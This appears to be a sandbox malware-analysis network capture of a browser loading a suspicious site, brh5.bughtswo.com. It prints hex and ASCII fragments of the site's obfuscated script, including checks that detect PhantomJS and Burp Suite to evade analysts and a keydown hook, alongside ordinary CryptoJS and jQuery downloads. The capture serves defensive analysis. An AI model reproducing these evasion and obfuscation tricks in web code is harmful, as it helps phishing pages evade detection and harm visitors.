                                                            2025-01-07 20:28:53 UTC1369INData Raw: 6d 74 46 48 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 4c 48 53 64 74 76 66 6d 4d 68 20 3f 20 52 73 53 68 49 43 6d 74 46 48 2e 68 6f 73 74 6e 61 6d 65 20 3a 20 52 73 53 68 49 43 6d 74 46 48 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 2f 2a 20 54 68 65 20 6f 6e 6c 79 20 70 6c 61 63 65 20 77 68 65 72 65 20 73 75 63 63 65 73 73 20 63 6f 6d 65 73 20 62 65 66 6f 72 65 20 77 6f 72 6b 20 69 73 20 69 6e 20 74 68 65 20 64 69 63 74 69 6f 6e 61 72 79 2e 20 2a 2f 0d 0a 69 66 28 4c 44 45 42 43 53 7a 76 7a 56 20 3d 3d 20 4c 48 53 64 74 76 66 6d 4d 68 29 7b 0d 0a 63 6f 6e 73 74 20 50 65 4c 52 41 78 6e 63 54 5a 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d
                                                            Data Ascii: mtFH.hostname === LHSdtvfmMh ? RsShICmtFH.hostname : RsShICmtFH.hostname.split('.').slice(-2).join('.');/* The only place where success comes before work is in the dictionary. */if(LDEBCSzvzV == LHSdtvfmMh){const PeLRAxncTZ = window.location.pathnam
                                                            2025-01-07 20:28:53 UTC1369INData Raw: 57 70 46 49 47 67 30 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 69 34 31 63 6d 56 74 4f 32 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 6a 55 77 4d 44 74 73 61 57 35 6c 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4c 6a 49 37 66 51 30 4b 49 31 6c 6a 53 6e 4e 69 62 6b 52 42 61 6b 55 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 31 6c 6a 53 6e 4e 69 62 6b 52 42 61 6b 55 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 57 57 4e 4b 63 32 4a 75 52 45 46 71 52 53 42 77
                                                            Data Ascii: WpFIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI1ljSnNibkRBakUgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI1ljSnNibkRBakUgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojWWNKc2JuREFqRSBw
                                                            2025-01-07 20:28:53 UTC1369INData Raw: 5a 6c 63 69 42 38 66 43 42 33 61 57 35 6b 62 33 63 75 59 32 46 73 62 46 42 6f 59 57 35 30 62 32 30 67 66 48 77 67 64 32 6c 75 5a 47 39 33 4c 6c 39 77 61 47 46 75 64 47 39 74 49 48 78 38 49 47 35 68 64 6d 6c 6e 59 58 52 76 63 69 35 31 63 32 56 79 51 57 64 6c 62 6e 51 75 61 57 35 6a 62 48 56 6b 5a 58 4d 6f 49 6b 4a 31 63 6e 41 69 4b 53 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 67 50 53 41 69 59 57 4a 76 64 58 51 36 59 6d 78 68 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49
                                                            Data Ascii: ZlciB8fCB3aW5kb3cuY2FsbFBoYW50b20gfHwgd2luZG93Ll9waGFudG9tIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5jbHVkZXMoIkJ1cnAiKSkgew0KICAgICAgICB3aW5kb3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogI


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.1649709104.17.24.144436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:54 UTC651OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                            Host: cdnjs.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://brh5.bughtswo.com/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:28:54 UTC959INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:28:54 GMT
                                                            Content-Type: application/javascript; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            Cache-Control: public, max-age=30672000
                                                            ETag: W/"61182885-40eb"
                                                            Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                            cf-cdnjs-via: cfworker/kv
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Timing-Allow-Origin: *
                                                            X-Content-Type-Options: nosniff
                                                            CF-Cache-Status: HIT
                                                            Age: 1147482
                                                            Expires: Sun, 28 Dec 2025 20:28:54 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ut0JHCIdn2rp0d23MbgxN%2FedzGEz5HDJLYj5IdnoJWzmMO5Eb%2FlwemAwZEH3b76UfvtJd1K91oGuNkEZsXJiRX6cMvgmLsHQJMdx7DRZgyWlVQb3Yjcjn2G%2BE60wKyg0r8mvgDae"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                            Strict-Transport-Security: max-age=15780000
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6b2694aa243e2-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 20:28:54 UTC410INData Raw: 37 62 65 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                            Data Ascii: 7bea!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                            2025-01-07 20:28:54 UTC1369INData Raw: 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65
                                                            Data Ascii: f globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cre
                                                            2025-01-07 20:28:54 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73
                                                            Data Ascii: call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes
                                                            2025-01-07 20:28:54 UTC1369INData Raw: 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63
                                                            Data Ascii: peof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c
                                                            2025-01-07 20:28:54 UTC1369INData Raw: 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e
                                                            Data Ascii: var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>
                                                            2025-01-07 20:28:54 UTC1369INData Raw: 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30
                                                            Data Ascii: for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0
                                                            2025-01-07 20:28:54 UTC1369INData Raw: 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66
                                                            Data Ascii: r,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:f
                                                            2025-01-07 20:28:54 UTC1369INData Raw: 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50
                                                            Data Ascii: harAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOP
                                                            2025-01-07 20:28:54 UTC1369INData Raw: 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69
                                                            Data Ascii: a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=thi
                                                            2025-01-07 20:28:54 UTC1369INData Raw: 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41
                                                            Data Ascii: ),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.1649707151.101.194.1374436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:54 UTC623OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                            Host: code.jquery.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://brh5.bughtswo.com/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:28:54 UTC613INHTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 89501
                                                            Server: nginx
                                                            Content-Type: application/javascript; charset=utf-8
                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                            ETag: "28feccc0-15d9d"
                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Via: 1.1 varnish, 1.1 varnish
                                                            Accept-Ranges: bytes
                                                            Age: 1766260
                                                            Date: Tue, 07 Jan 2025 20:28:54 GMT
                                                            X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740056-EWR
                                                            X-Cache: HIT, HIT
                                                            X-Cache-Hits: 2774, 0
                                                            X-Timer: S1736281735.579423,VS0,VE2
                                                            Vary: Accept-Encoding
                                                            2025-01-07 20:28:54 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                            2025-01-07 20:28:54 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                            Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                            2025-01-07 20:28:54 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 